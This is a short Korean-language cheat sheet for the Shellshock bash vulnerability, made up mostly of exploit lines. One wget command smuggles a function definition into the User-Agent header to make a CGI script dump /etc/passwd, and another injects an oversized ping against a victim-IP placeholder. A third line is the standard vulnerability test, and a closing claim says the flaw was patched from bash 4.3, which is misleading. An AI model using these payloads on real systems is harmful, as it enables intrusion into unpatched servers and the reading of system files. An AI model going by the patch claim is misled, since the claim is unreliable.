wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/test.cgi
() { :; }; ping -s 1000000 <victim IP>
Shell Shock 테스트 코드 ( Bash version 4.2.50(1) release GNU)
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Shell Shock 취약점은 bash 4.3부터 패치되었다.
bash의 버전체크는 아래와 같이 한다.
bash --version.